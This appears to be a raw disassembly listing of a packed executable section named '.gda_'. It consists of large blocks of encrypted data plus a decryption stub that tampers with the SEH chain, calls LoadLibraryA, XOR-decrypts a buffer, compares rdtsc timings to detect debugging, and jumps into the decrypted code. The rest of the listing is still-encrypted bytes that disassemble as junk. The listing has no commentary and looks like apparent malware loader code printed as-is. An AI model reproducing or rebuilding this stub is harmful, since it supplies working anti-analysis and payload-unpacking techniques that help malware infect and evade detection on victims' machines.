		dd 301800DEh, 950C6448h, 0F26CD40h, 0DBBDD7F7h,	0B498B650h
		dd 64F8E0C8h, 8E3FA83Fh, 0F9005F77h, 9BD0FE28h,	0E4B868F0h
		dd 85606BACh, 0FB5FCBF0h, 8813059Fh, 10F0E0FEh,	3F2D4028h
		dd 0E8311D08h, 441800DEh, 6E43880Eh, 0D9603F57h, 5AF10910h
		dd 86A005CDh, 131C20C8h, 48DDE522h, 6013A0BEh, 0B592AA59h
		dd 904E58C1h, 0FA987002h, 6600A58Dh, 8FE2A68h, 950F1D2Ah
		dd 706E78A3h, 0D0B8A098h, 79A8079Ch, 0E5C006E2h, 4073A654h
		dd 900B8AE0h, 202509C3h, 0E7F8D6F7h, 4660CBADh,	0D0B88088h
		dd 801175E8h, 13FD6A10h, 5AD8F690h, 90B9986Eh, 8813059Fh
		dd 10B8E0FEh, 732C4028h, 0DA906408h, 620834Dh, 19D30648h
		dd 0C6E75415h, 0D5CF8B08h, 0B0AEB8E3h, 50F8E0C8h, 20E8495Dh
		dd 0E83B258Ah, 0C7B200DEh, 0A640EBCDh, 0F0D840A8h, 0E0335508h
		dd 341D8AD0h, 0BAF8D6F0h, 0C83E7DC3h, 554FB8B9h, 302E3863h
		dd 90786148h, 0D968C2DCh, 68BC8502h, 5458805Eh,	945DEACBh
		dd 16587610h, 5100C623h
		dd 0BB9DF718h, 90785670h, 85D8C0AAh, 5AF0940Ah,	86A004CDh
		dd 995386C8h, 4667F095h, 0F8201888h, 0C7B300E8h, 0A640EBCDh
		dd 0F0D8C8A8h, 0B8495408h, 4F677D59h, 2873653Fh, 7458401Eh
		dd 0DBCDA088h, 0B512B858h, 904E58CDh, 7952B02h,	6600AB8Dh
		dd 0B0908068h, 76E995C8h, 7AB8C390h, 0E680252Dh, 3B366E8h
		dd 8593CA88h, 0E8F178CEh, 68BD8502h, 5458805Eh,	955DEACBh
		dd 16587610h, 5B3D5723h, 301836D0h, 0F6786058h,	84184110h
		dd 58FCA00Bh, 881D2562h, 0BB9EE0FEh, 0F9DDF627h, 7BB896B0h
		dd 0CFE4C000h, 1BFD97B7h, 0F0D8F690h, 24782008h, 0B2C83061h
		dd 26C0634Dh, 0F5AFEA28h, 0D08E9803h, 301820E8h, 920DE6F8h
		dd 0BF55C4ACh, 0D39DAAF6h, 3998B650h, 26C77845h, 0F0F32628h
		dd 0D7CDA574h, 7F980058h, 78D220B7h, 0F273CD1h,	68B3A5FFh
		dd 0F098805Eh, 0A89EE0C8h, 722D714Eh, 7BDE893Ch, 0B5121858h
		dd 904E58CDh, 5ADB2068h, 0AFC474E0h, 47103097h,	26C06B4Dh
		dd 70D84028h, 60BAD588h, 0B3BD8A6Eh, 0F6785670h, 0F5244003h
		dd 5088277Dh, 0F067CFE8h, 0ECD30862h, 0F5AFBFD7h, 0D08E9803h
		dd 301900E8h, 0D0C86B3Dh, 0C85B45A2h, 0BB92203Eh, 3320E667h
		dd 935DEA08h, 16587610h, 7AB91023h, 893851Fh, 9078607Eh
		dd 0DFADC0AAh, 68B3A5FFh, 0B098805Eh, 0A8DE0CCh, 0F5528098h
		dd 0D08E980Dh, 892A562h, 70B9607Eh, 9660A6B8h, 50888B89h
		dd 0F0288883h, 287D65C2h, 87F2401Eh, 0E6802B0Dh, 381800E8h
		dd 0F6681548h, 0FA304310h, 6600A4ADh, 33E668h, 0A0F00BC9h
		dd 0F4DD4A60h, 7AB896B0h, 893851Fh, 9078607Eh, 8569C0B8h
		dd 0E85E057Dh, 159278EBh, 10CED84Ch, 0B06BEB4Eh, 48058922h
		dd 0C71836D7h, 0A640EBCDh, 0D0D8C0A8h, 0E1275508h, 0D6836B1Fh
		dd 1AE0E970h, 4660C48Dh, 0D35C6088h, 89CA5E2h, 3B1E607Eh
		dd 0CF407D81h, 91B2203Eh, 8F0025E2h, 0BB9EE0FEh, 0F55A1898h
		dd 0D08E980Bh, 0BB9DF742h, 93785670h, 84D9C0A8h, 0DBBDD72Ah
		dd 0B098B650h, 65FCE0C8h, 0FBDDB73Eh, 0D0B896B0h, 451B00E8h
		dd 6AFC884Dh, 5B303F57h, 0A7C7DFF2h, 86A00BEDh,	10F8E0C8h
		dd 0C05B3420h, 554F0A41h, 302E3863h, 10786048h,	0F768E0DCh
		dd 68BBA522h, 5059805Eh, 1871EDD2h, 0D55A400Ch,	0D08E980Bh
		dd 0B01BE428h, 20D3648Ch, 48BE6AC9h, 0F532C0F7h, 0B0AEB8EBh
		dd 950F4BAEh, 706E78A3h, 0D0B8A0A8h, 0B5EF539Ch, 904E58C3h
		dd 0D0D8C0A8h, 97CF2D7Ch, 0B098806Bh, 8048E5BCh, 0FBABAB82h
		dd 40352B4Fh, 1B1836D7h, 6C39E989h, 75D29818h, 500E188Bh
		dd 3B1D77C2h, 10F8D6F0h, 4580028h, 8000C684h, 0B39D0A2Bh
		dd 7B785670h, 0F60A6A2h, 0D39D2AE8h, 0D698B650h, 9B7D1763h
		dd 73587610h, 0A4B9A088h, 0BB9DF79Bh, 90785670h, 84F8C0A8h
		dd 53FFD705h, 0C4988068h, 0BA6850CDh, 0BFD3B3C3h, 0EF102503h
		dd 0F83300DEh, 0A38428C1h, 7B5D3761h, 50381630h, 0C5980068h
		dd 937D6DC6h, 0FA587610h, 2938E080h, 0BDE073EBh, 0B43CAD4Ch
		dd 1019C0B8h, 0FBB39000h, 8FE868Bh, 0BB9E20F9h,	0F0D7F84Eh
		dd 0D0B818E0h, 56F902E8h, 15D338E3h, 96DEB561h,	36F811B0h
		dd 1A5B30C3h, 28606545h, 0F5AF401Eh, 0D08E9803h, 201800E8h
		dd 0BB2F663Dh, 0E9339850h, 7B107383h, 3B48AB90h, 26C75045h
		dd 0E0CD4128h, 0D1B896B7h, 145C8BD1h, 0F8C5E94Ch, 7BD8F6B8h
		dd 6607B4B5h, 201DAB68h, 0E7F8D6F7h, 4660CBADh,	0D0B8E088h
		dd 0C71A74E8h, 94BACB90h, 738F96A8h, 6607E8B5h,	34978068h
		dd 10F8E111h, 70584DC0h, 82FDEB88h, 35445A6h, 0DC3C4E7Ah
		dd 6527C0E4h, 500E1B72h, 8F4405E1h, 9BABE0FEh, 0A85B7C70h
		dd 5B90D377h, 0D0F034ABh, 1B879FBDh, 0C6E77C3Dh, 123B7B08h
		dd 501D0964h, 13F8D6F7h, 0F5D1486Ah, 0D08E9F6Ch, 0CF307363h
		dd 9078E0FBh, 56128A8h,	0EDB3DFF7h, 0B0AEBFD4h,	0E555089Eh
		dd 0E5D3BFD7h, 0D08E9F34h, 33104A63h, 5E536C02h, 0FFDD292Bh
		dd 50394080h, 0EA1C8F68h, 13F8E0C9h, 4667809Dh,	500DA388h
		dd 9C1836D7h, 15778874h, 0F0D8C00Ah, 7B3C6685h,	86A700EDh
		dd 40FEE3C8h, 8FAD2AC0h, 6C052377h, 301836D7h, 0D7436B3Dh
		dd 0EB5BCFA4h, 0BB382009h, 0C0DB964h, 1FF8D6F7h, 70594DADh
		dd 503DA388h, 561836D7h, 0B58758C9h, 0F02445A7h, 10B32008h
		dd 84DBAB6Ah, 0E5D50898h, 0CD61BFD7h, 0D08E9F34h, 30FC85E7h
		dd 157B6048h, 0F0EEFF68h, 6FB8A50Bh, 0B013805Eh, 1FF4A7E3h
		dd 70588DAAh, 0D8FF9B88h, 30DC83E7h, 50FB6048h,	0E49FC3AAh
		dd 6FB8A50Bh, 0E0CA805Eh, 2F245537h, 0E5A7401Eh, 0D08E9BB2h
		dd 3FD885B2h, 9078D7CDh, 0F04429A8h, 0AF042008h, 0B00C0567h
		dd 2E78E0C8h, 0FBDD4F3Dh, 5BB8A088h, 733301AEh,	2C90307Ch
		dd 0C9273F5Ch, 66079CB5h, 0B3EFF568h, 26C7204Dh, 0F0DD4328h
		dd 59B896B7h, 627E86Dh,	0AB78EB48h, 0C6E7202Dh,	6B305208h
		dd 86A764EDh, 2D9192C8h, 584028h, 0CF5097FAh, 0BD1800E8h
		dd 51F39C06h, 0B2DBC283h, 0B8BD1B18h, 0C598B657h, 3C63C4h
		dd 34D771D7h, 3BD9BCACh, 0B597C3F3h, 904E5FE8h,	706D4BC8h
		dd 0B8381637h, 4F677532h, 10F849A9h, 7E2DC028h,	0A2B4E7A3h
		dd 385F3BE1h, 6F44E247h, 0FF913F57h, 0AFC6928Dh, 94A40B97h
		dd 38734749h, 8FA74028h, 9253DF77h, 503C4A69h, 0DE986048h
		dd 0FC53009Bh, 98BDA72Ch, 3998B657h, 26C7244Dh,	0FFE1CD28h
		dd 0D3B8A0A0h, 627806Dh, 35DD0648h, 0F31EEBE6h,	1213344Ah
		dd 4BDE4664h, 43792720h, 75584028h, 59B8A088h, 6E47FCAEh
		dd 587378Bh, 0F0EEFB2Eh, 5F27C8C9h, 0B0999AEDh,	7AACB0C8h
		dd 8FA72A00h, 0E683461Dh, 6FD885E8h, 917DE847h,	0AA30C0A8h
		dd 0B8C7DFEDh, 0B0988079h, 568C859Bh, 233D2C41h, 0A2CDC3EDh
		dd 71617481h, 0C4CD9F48h, 0FD8F697h, 66031A9Dh,	0EC1D0968h
		dd 0F8F8D6F7h, 70584031h, 0B1ECC5DBh, 47576583h, 0E30A0526h
		dd 0A0A8A9C0h, 394E497Ah, 0D5FFE504h, 3B10B7C8h, 98A7BFC1h
		dd 0D0B8A09Bh, 554A65BBh, 0E217143Bh, 99AA90CDh, 3554497Eh
		dd 0E798E50Fh, 0EF11ED20h, 704AA8D7h, 0B5EBA088h, 5B7B61AAh
		dd 0E228103Dh, 9CB1B6C1h, 505D476Dh, 5868683Fh,	8101F37h
		dd 23584028h, 0B1D0E3EDh, 7E7D6786h, 0F6111427h, 99AA90D1h
		dd 3554497Eh, 0E798E50Fh, 0EF102D20h, 0FD0C10D7h, 0E682380Dh
		dd 607C6AE8h, 6F2F6122h, 0C6E3323Dh, 7404A908h,	8BB61597h
		dd 0D0D2E0FEh, 4E08FDA5h, 80E8A0BEh, 0A8ADFFB8h, 0F8785672h
		dd 0F0DCC0A9h, 7394A5Ch, 8FC41597h, 7AACE0FEh, 0E5A7172Ch
		dd 0D08E9FD4h, 0CF0CC46Bh, 0A64734FDh, 9A4D3FA8h, 0F381633h
		dd 0E02D0DABh, 46F8D6F6h, 4B36D5D7h, 283BA0BEh,	8B9C0F17h
		dd 19786048h, 0C6E7A02Dh, 6384A08h, 8B321597h, 0D07DE0FEh
		dd 70FCC427h, 1093A088h, 337250B8h, 0F8790A18h,	30D8C0A8h
		dd 1AADDF5Eh, 3398B653h, 94F71F30h, 705845C0h, 0EFDC2501h
		dd 0BD9500DEh, 904E5F20h, 0CFA85525h, 269203Eh,	4FC88002h
		dd 26C3965Dh, 8FA0C328h, 0D50E2487h, 307200E8h,	0AF1CD5B7h
		dd 6527C09Eh, 500E1B7Ah, 0BF6778EBh, 10FD7F4Ch,	8DDC928h
		dd 0E3B896B7h, 61DB0321h, 94123118h, 946D3FF9h,	0AF381637h
		dd 86A3CEFDh, 1F3865C8h, 705D3BACh, 59719388h, 6277C6Dh
		dd 0C1293148h, 0FFD8DFC0h, 0C5C77008h, 0B0AEBBFEh, 94F7204Dh
		dd 7058451Ch, 0EF382501h
		dd 88DB00DEh, 90780FA7h, 7E08B23h, 6600AB8Dh, 0B0988068h
		dd 13FE95D8h, 464828ADh, 0D36A9388h, 0C7E9F729h, 1CFDE9A9h
		dd 48D8F697h, 5038089Fh, 0B3A4CBE3h, 26E8884Dh,	738A7328h
		dd 27495749h, 0B49D8909h, 53785677h, 0F69377A7h, 0DD0DC3F1h
		dd 797983Bh, 0C0FBF48Bh, 58992B61h, 0EA39708Bh,	5E7177B7h
		dd 136514B1h, 82D9CCD2h, 6C73ABE8h, 0B38CC2E3h,	5475F08Ah
		dd 0A9AFBF60h, 558361ABh, 302E3F90h, 0B42CEB8Bh, 7F18F3B8h
		dd 5038988Ah, 7F134368h, 0AD75EB23h, 706E7E78h,	0E3672B74h
		dd 5124AC21h, 0EA44663Ah, 0D0F4C2DFh, 24641CA2h, 0C4B6BC84h
		dd 65F8DC15h, 0FB91A3C0h, 88FD9D89h, 3B6C00ADh,	0C23B3375h
		dd 0C35DCFA8h, 0DBC7DFF7h, 0F9CFBD6Bh, 94F7A386h, 8FA7BF0Eh
		dd 85FBF7B5h, 2B9C0FA6h, 0AD879FB7h, 0C2EB83FFh, 0AF28A407h
		dd 0E0A57F97h, 1FB7B49Bh, 8FA745ACh, 38639377h,	0CFE7FEC5h
		dd 6A90703Dh, 18273F54h, 0AFC7DE29h, 4E740467h,	0C2CB1F37h
		dd 705856C0h, 2FDB4888h, 30F0FF17h, 0CD786048h,	0C3E12D29h
		dd 8BD1203Eh, 0D498806Bh, 0A573D237h, 706E7FA8h, 0B69A29ECh
		dd 6A553E69h, 93BCE547h, 0AE53C0A8h, 36E62334h,	0F5C8BBE9h
		dd 134C65C7h, 33AF4028h, 0D098A09Eh, 979D0FE8h,	6678604Bh
		dd 0FFDA9CEBh, 503BBD8Ch, 0B8DB0B68h, 0B05840F5h, 0FFDC4F88h
		dd 0EDB8A08Bh, 103820C8h, 93FCE447h, 4930C0A8h,	5FC7DFF6h
		dd 0B09BF9EAh, 0D45D63C8h, 70587617h, 5BB0E203h, 0F13310A2h
		dd 504B643Bh, 38DBC543h, 0D9286A81h, 86A708EDh,	1CB2E3C8h
		dd 71584090h, 7A50F188h, 0E7FF0Fh, 0A640E9DDh, 0C0F871A8h
		dd 6600AABDh, 4EB8EA68h, 480B801h, 8FBFD0C0h, 0DF6A2577h
		dd 0D2CBC27Ch, 0A8F3F579h, 1533C09Eh, 68B3A5FFh, 0B098805Eh
		dd 328CE1C8h, 48D3C5DFh, 0D0BBA0BEh, 3C6D00E8h,	0A8F3C5C9h
		dd 0F27C09Eh, 5AD3DBF7h, 88130DE9h, 10F8E0FEh, 76304828h
		dd 89B8A088h, 30180680h, 0D2903848h, 7A273F4Fh,	6600A38Dh
		dd 9A1C0668h, 10CED84Bh, 48DBC5A0h, 305AA0BEh, 893851Fh
		dd 9070607Eh, 0F9ADC0A8h, 68BD9D88h, 0C499805Eh, 9B7D170Dh
		dd 70587610h, 0A4B0A088h, 0B3A580F3h, 95785670h, 4D5870DCh
		dd 500E188Ch, 303FF46Dh, 26C06575h, 0EE2C4528h,	0E833257Fh
		dd 301800DEh, 990CE048h, 0C85B7D28h, 273A203Eh,	783D03E1h
		dd 10F8D6F7h, 8FAB47C0h, 2DD94877h, 40F0FF17h, 1B78604Ah
		dd 0C6E74435h, 0D8A52308h, 5898B657h, 0EF071CB1h, 7208C427h
		dd 6533A088h, 302E3F68h, 93443EC3h, 0DA22876h, 0D237DFF7h
		dd 0B0988252h, 70DCAA49h, 0FBB84028h, 0D3EEF276h, 4A1B1492h
		dd 1BFD9758h, 0F0D8F690h, 25282008h, 7C25097Ch,	9DF8D6F7h
		dd 4660D89Dh, 0B8352B88h, 0C31836F8h, 0B6C137ECh, 7DD8C0A2h
		dd 662820BDh, 13D7368h,	0E3FA03C8h, 0FBDDB78Ch,	0D0B896B0h
		dd 3F0800E8h, 9078CECCh, 0D8AB3FA8h, 0AFD696E0h, 0C0D0B97h
		dd 95F8D6F7h, 0E8DC4FFAh, 5BB8A088h, 627805Dh, 8032EB48h
		dd 90FC8A29h, 7BD82008h, 0B2EB8822h, 62FB29FBh,	18D57B3Ch
		dd 5BB89698h, 6086865h,	1B2E1248h, 555BE494h, 500E3060h
		dd 0D83F0368h, 10F8E0C8h, 71503AA3h, 27BBA8C2h,	0B593F76Fh
		dd 904E5FDCh, 0C853455Fh, 5078203Eh, 0B2EC8068h, 62FBF83Fh
		dd 0F9686924h, 0E687683Dh, 186B8BE8h, 158F5049h, 0F0EEF823h
		dd 50382048h, 0A86F821Ch, 0ECB10899h, 9B01BFD7h, 0F8CBA384h
		dd 611472C3h, 0CFDC931Eh, 686D4DF1h, 0D9381630h, 86A74CD5h
		dd 4F5C13C8h, 0E2694F76h, 0D06C2705h, 0A52200E8h, 904E58C1h
		dd 22B1C6DDh, 420C7670h, 5868D0E0h, 0EF073A73h,	7C12CB72h
		dd 27A8EA8Bh, 6208B6Dh,	90786048h, 0F5994DB8h, 0DDB1337Dh
		dd 0B0AEBFA0h, 9065CBh,	0D7DB401Eh, 0D0B8A0E0h,	185B2BE8h
		dd 902BE7C1h, 752FC0A8h, 500E1C40h, 0B0988069h,	533FE7BCh
		dd 0D0F8E020h, 5B3D5728h, 301836D0h, 0E4F86048h, 8A3092AFh
		dd 0AC7DFFFh, 8F500DE3h, 151BE0FEh, 9B700BA1h, 14352B85h
		dd 0D31836D7h, 1B7B8B4Ah, 752FE8E3h, 500E1883h,	0B098806Bh
		dd 9573F4BCh, 706E7FE4h, 0EF002D8Bh, 0B51B00DEh, 904E5FFCh
		dd 0BA53C8A9h, 0D4BDAB18h, 8998B657h, 138BE882h, 71500AA1h
		dd 0B33BB0CAh, 0B59300B0h, 904E5FC4h, 0F0F058C0h, 587A2108h
		dd 0E0DB8131h, 28717542h, 0F5AF401Eh, 0D08E9803h, 201800E8h
		dd 1D7B663Ch, 0F0EED0C0h, 0D5CF20BEh, 0B0AEB8E3h, 10FAE0C8h
		dd 0B6A6545Dh, 0E833257Fh, 301800DEh, 960D604Ch, 0C8527522h
		dd 0D5CF203Eh, 0B0AEB8E3h, 10F8A0C8h, 77D24B5Dh, 0D212628Ah
		dd 0DBEFE23Eh, 0A27FEA41h, 26DA6A6Ah, 820BD7EAh, 0D4BA0B0Ch
		dd 93A0E247h, 46672495h, 54B7A088h, 0CFE7FA36h,	0AFF8D5B7h
		dd 6527C09Eh, 500E1BB2h, 8FE43597h, 8507E0FEh, 706E7B06h
		dd 0EFD02D05h, 0A59500DEh, 904E5F38h, 0F0B292F9h, 6F5C95F7h
		dd 2567805Eh, 10CEDB66h, 4F3CF5D7h, 4547A0BEh, 302E3BC6h
		dd 0AE28D5C5h, 4527C09Eh, 500E1F68h, 1A0D7F3Eh,	93F8D6F3h
		dd 4667248Dh, 387BA088h, 301800E8h, 11790A15h, 0C6EF5645h
		dd 5FC87808h, 0A5EC05A9h, 0D07DE0FEh, 8F90C3EBh, 5579AF78h
		dd 302E159Ch, 90685D8Bh, 0ECADC082h, 7444A16Eh,	0C5E9EC64h
		dd 0D41080DBh, 5A7BFD7h, 2A6C488Dh, 0E2F0FF17h,	0F1879FB7h
		dd 88F53F86h, 0E82A145Eh, 0B098804Dh, 0EF5D08A8h, 492DBFD7h
		dd 0E09CE403h, 0E48B565h, 0C0F3607Eh, 0CA59A6A0h, 754B220Eh
		dd 0B098E83Eh, 0D473E037h, 200A4042h, 0EB423577h, 0F49B00DEh
		dd 0CC46E140h, 8584FF97h, 54FEA30Bh, 4F620180h,	0EF870837h
		dd 0B339BFD7h, 0D0B8D430h, 88A9EBE8h, 90786067h, 0F0D8DD40h
		dd 5018E208h, 0B098B0D0h, 10E808C8h, 549A4028h,	0D13D1888h
		dd 33F000E8h, 52786048h, 0A455C084h, 7EF52C2Ch,	0CC9878EBh
		dd 101080D1h, 0FB584028h, 8D8884DCh, 0DD991A63h, 904E5825h
		dd 0F391440h, 54FA41F7h, 0B19F8668h, 38FAE3CDh,	93F99FADh
		dd 3815FF6Ah, 8D004432h, 49h, 1CDh dup(0)
		dd 0F0000000h, 7FFDh, 13DEh dup(0)
		db 0, 60h
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		call	loc_3143A014
		call	sub_3143A09C
		jmp	near ptr byte_3143A045
; ---------------------------------------------------------------------------


loc_3143A014:				; CODE XREF: .gda_:3143A005p
		push	dword ptr fs:0
		mov	ds:dword_3143A046, ebp
		mov	fs:0, esp
		xor	eax, eax
		push	2000h
		push	eax
		push	10h
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	80000000h
		call	ds:dword_3142808C	; LoadLibraryA
; ---------------------------------------------------------------------------
byte_3143A045	db 0BDh			; CODE XREF: .gda_:3143A00Fj
dword_3143A046	dd 12FF64h		; DATA XREF: .gda_:3143A01Aw
; ---------------------------------------------------------------------------
		mov	edi, [ebp-8]
		mov	fs:0, edi
		cld
		sub	eax, eax


loc_3143A056:				; CODE XREF: .gda_:3143A05Cj
		dec	al
		or	al, al
		jz	short loc_3143A060
		jnz	short loc_3143A056
		jmp	short loc_3143A0C7
; ---------------------------------------------------------------------------


loc_3143A060:				; CODE XREF: .gda_:3143A05Aj
		call	sub_3143A099
		add	edx, 44h
		sub	ebx, ebx
		xor	ebx, 2898h
		cld
		stc
		mov	edi, 0B4h
		push	edx


loc_3143A07B:				; CODE XREF: .gda_:3143A08Ej
		xchg	al, [edx]
		xor	ax, di
		cld
		cld
		xchg	al, [edx]
		cld
		cld
		add	edx, 1
		sub	ebx, 1
		or	ebx, ebx
		jnz	short loc_3143A07B
		pop	edx
		leave
		mov	[esp+14h], edx
		popa
		jmp	edx

; =============== S U B	R O U T	I N E =======================================



sub_3143A099	proc near		; CODE XREF: .gda_:loc_3143A060p
		pop	edx
		jmp	edx
sub_3143A099	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143A09C	proc near		; CODE XREF: .gda_:3143A00Ap

arg_C		= dword	ptr  10h

		mov	edx, [esp+arg_C]
		xor	eax, eax
		pop	dword ptr [edx+0B8h]
		retn
sub_3143A09C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0E8h, 2 dup(0)
		dd 48B0000h, 9889FC24h,	2FCBh, 288680F7h, 0
		dd 5C8B8000h
		db 24h,	4, 74h
; ---------------------------------------------------------------------------


loc_3143A0C7:				; CODE XREF: .gda_:3143A05Ej
		sub	eax, 0CFB08959h
		das
; ---------------------------------------------------------------------------
		db 2 dup(0), 57h
; ---------------------------------------------------------------------------
		pop	dword ptr [eax+2FD3h]
		cmp	byte ptr [eax+288Ah], 0E8h
		jnz	short loc_3143A0EC
		add	ebx, [eax+288Bh]
		mov	ebx, [ebx+2]
		push	dword ptr [ebx]
		jmp	short loc_3143A0F4
; ---------------------------------------------------------------------------


loc_3143A0EC:				; CODE XREF: .gda_:3143A0DDj
		mov	ebx, [eax+288Ch]
		push	dword ptr [ebx]


loc_3143A0F4:				; CODE XREF: .gda_:3143A0EAj
		pop	ebx
		push	ebp
		mov	ebp, eax
		sub	dword ptr [esp+4], 5
		sub	ebp, 361005h
		mov	edi, [esp+4]
		lea	esi, [ebp+363898h]
		mov	ecx, 0
		rep movsb
		call	sub_3143A16A
		mov	ecx, eax
		call	sub_3143A16A
		sub	eax, ecx
		jz	short loc_3143A13E
		cmp	eax, 100h
		ja	short loc_3143A13E
		lea	eax, [ebp+3610D4h]
		mov	dl, [eax-10h]
		call	sub_3143A16E
		jmp	short loc_3143A17D
; ---------------------------------------------------------------------------


loc_3143A13E:				; CODE XREF: .gda_:3143A125j
					; .gda_:3143A12Cj
		test	dword ptr [ebp+36388Bh], 80000000h
		jz	short loc_3143A168
		lea	esi, [ebp+36388Fh]
		mov	edi, [esp+4]
		movsb
		movsd
		mov	esi, [ebp+363FD4h]
		mov	edi, [ebp+363FD8h]
		mov	ebx, [ebp+363FD0h]


loc_3143A168:				; CODE XREF: .gda_:3143A148j
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_3143A16A	proc near		; CODE XREF: .gda_:3143A117p
					; .gda_:3143A11Ep
		rdtsc
		retn
sub_3143A16A	endp

; ---------------------------------------------------------------------------
		pop	esp

; =============== S U B	R O U T	I N E =======================================



sub_3143A16E	proc near		; CODE XREF: .gda_:3143A137p
		mov	dh, dl
		mov	ecx, 27B7h


loc_3143A175:				; CODE XREF: sub_3143A16E+Cj
		xor	[eax], dl
		inc	eax
		add	dl, dh
		loop	loc_3143A175
		retn
sub_3143A16E	endp

; ---------------------------------------------------------------------------


loc_3143A17D:				; CODE XREF: .gda_:3143A13Cj
		fstp	qword ptr [ebx+14h]
		xor	byte ptr [ebx],	0D7h
		add	eax, 9CCC729Bh
		cmp	edi, ebx
		jl	short loc_3143A1F8
		inc	ecx
		idiv	dword ptr [eax-2Bh]
		xor	[ebp+ebx*4+5B3F2BABh], cl
		imul	dword ptr [edx+ecx]
		dec	ecx
		sbb	al, 0D0h
		cdq
		dec	ebp
		js	short loc_3143A21C
		sbb	al, 0D0h
		pop	es
		mov	bl, 37h
		push	54h
		pop	ebx
		db	66h
		nop
		out	0B3h, eax	; Interrupt Controller #2, 8259A
		int	55h
		push	edi
		jnb	short loc_3143A21C
		jmp	near ptr 0B94BC473h
; ---------------------------------------------------------------------------
		db 41h
		dd 0A1306D99h, 70F93F6Fh, 6ECAC904h, 0DD5B61B9h, 1683885Ch
		db 0E4h
; ---------------------------------------------------------------------------


loc_3143A1CD:				; CODE XREF: .gda_:loc_3143A21Cj
		inc	ebp
		jnp	short near ptr byte_3143A1F7
		aas
		cmp	ebp, esp
		or	ch, [ebx]
		xchg	al, [edi+esi*4-15h]
		out	0FCh, eax	; AT 80287 data.
					; 286 sends opcodes & operands and receives results.


loc_3143A1DB:				; CODE XREF: .gda_:loc_3143A1F8j
		mov	ds:98D02F83h, eax
		lock dec esp
		test	al, 47h
		or	al, 0D3h
		imul	edx, [ecx], -68h
		dec	ebp
		out	80h, al		; manufacture's diagnostic checkpoint
		sub	al, 0F9h
		clc
		pop	es
		dec	edi
; ---------------------------------------------------------------------------
		db 0DAh, 0E1h, 41h
		db 0Eh,	47h, 0EEh
byte_3143A1F7	db 34h			; CODE XREF: .gda_:3143A1CEj
; ---------------------------------------------------------------------------


loc_3143A1F8:				; CODE XREF: .gda_:3143A18Aj
		js	short loc_3143A1DB
		dec	eax
		movsb
		add	[edi], bl
		retf	1171h
; ---------------------------------------------------------------------------
		db 0B8h, 4Dh, 0C1h
		dd 80F65996h, 9B5BAC11h, 0E6FD9516h, 0ACE8BA0Bh, 0B458FCADh
		dd 68BC0957h
; ---------------------------------------------------------------------------


loc_3143A21C:				; CODE XREF: .gda_:3143A19Fj
					; .gda_:3143A1B0j
		loope	loc_3143A1CD
		dec	esp
		rol	dword ptr [edx+6076C73Eh], 1
		out	dx, eax
		out	0A2h, eax	; Interrupt Controller #2, 8259A
		pop	ecx
		test	eax, 9C76DFBEh	; CODE XREF: .gda_:3143A260j
		adc	[edi+41680CB3h], dl
		loopne	loc_3143A2A9
		pop	esp
		aaa
		outsd
		adc	esi, [edi-7136000Ch]
		das
		inc	esi
		int	3		; Trap to Debugger
		lodsd
		inc	esp
		out	dx, eax
		mov	ecx, 0AC50F719h
		mov	cl, bl
		in	eax, dx
		or	[esi-2Ch], ecx
		xor	ecx, edi
		cld
		mov	ebx, 82672C15h
		adc	[edx-156AF6BBh], dl
		cmp	[ebx], bl
		jnz	short near ptr loc_3143A229+1 ;	CODE XREF: .gda_:3143A26Ej
		mov	ebp, 1F576032h
		div	dword ptr [ebp-58h]
		popf
		rol	byte ptr [eax-64h], cl
		jnp	short near ptr loc_3143A260+1
		les	ebx, [ecx]
		pop	esi
		les	esp, [eax]
; ---------------------------------------------------------------------------
		db 0FFh, 7Dh, 4Ch
		dd 0A448DA85h, 1C4F983h, 0D328CC46h, 0E64AB926h, 0ED09AC66h
		dd 0E2432675h, 0B45D0130h, 8758CAB5h, 6275E1D9h, 2538EABBh
		dd 723A4D0h, 8B47BC60h
; ---------------------------------------------------------------------------
		inc	ebp


loc_3143A2A9:				; CODE XREF: .gda_:3143A234j
		stosb
		mov	bl, 0D2h
		inc	eax
		pop	ebp
		adc	[ebx-41h], cl
		mov	[esp+eax*8+73537C20h], bh
		test	[esi+34C3A708h], al
		mov	eax, 0A1C47004h
		add	esi, ebx
		pop	es
		scasb
		hlt
; ---------------------------------------------------------------------------
		dd 64675C38h, 2B7876C0h, 72D332A5h, 0BB9879A0h,	24CA8294h
		dd 21B54B80h, 49E5CF0h,	88A153EBh, 65882CDBh, 62E89CADh
		dd 96FD81B0h, 0C7D84A32h, 27AA1335h, 0E8337CECh, 441BC41Ah
		dd 0CD0DB1B9h, 97089A4Bh, 5D84976Bh, 3169C67h, 0B730ABBCh
		dd 0DBC86D10h, 0A203E215h, 246CCFF0h, 0F0177CE5h, 0E4882E4Fh
		dd 3EF8F6D7h, 0C06864B1h, 34B0FC20h, 5B48ED90h,	22836295h
		dd 8BE84970h, 0F49ABE64h, 3408C650h, 0D0781CA8h, 85E8E630h
		dd 0DE0FF048h, 25A03C11h, 6B38DD80h, 32937265h,	7412D460h
		dd 71772CD1h, 54CEA77Eh, 0C4680958h, 36899520h,	0A422EC90h
		dd 7EB2BF59h, 36BD337Ah, 1F980ADBh, 0D98B6FA1h,	0D44E279Eh
		dd 706C8330h, 5C58FCA2h, 24C86C16h, 0D87C88CEh,	91574CBCh
		dd 742E871Ah, 0F342995Dh, 9DCB9C76h, 0FFAEB13Dh, 3A697C16h
		dd 0A63B0403h, 0A93B5C00h, 841EF78Ah, 0F41C33E0h, 0EF08AC52h
		dd 0E243D645h, 45987330h, 83BA792Fh, 0A1436C26h, 940EE762h
		dd 8BA93C0Fh, 422093E5h, 2A0DA7D0h, 0ABF8AA7Bh,	41E70DC0h
		dd 34EE4416h, 9F9A611Bh, 0E5B5C36h, 0B29BD8Fh, 0C2A07F65h
		dd 0BE852750h, 37782AFBh, 45997339h, 8C08792Fh,	9C206C26h
		dd 1938DC81h, 32941C4Dh, 1ED73760h, 1B51DAD0h, 0B57B9830h
		dd 0C72866B3h, 34B22BD9h, 11C5F4FAh, 148E49D7h,	8428D5C9h
		dd 0B99CB1E0h, 9BF753AEh, 0D0F5B7A6h, 44E88C7Dh, 39F39AA0h
		dd 16636857h, 68AD5164h, 0A8A87ACAh, 121A3506h,	0E64AAF7Bh
		dd 807369A2h, 34000CDAh, 0BFD87C4Fh, 2F48865Ch,	7CB836C4h
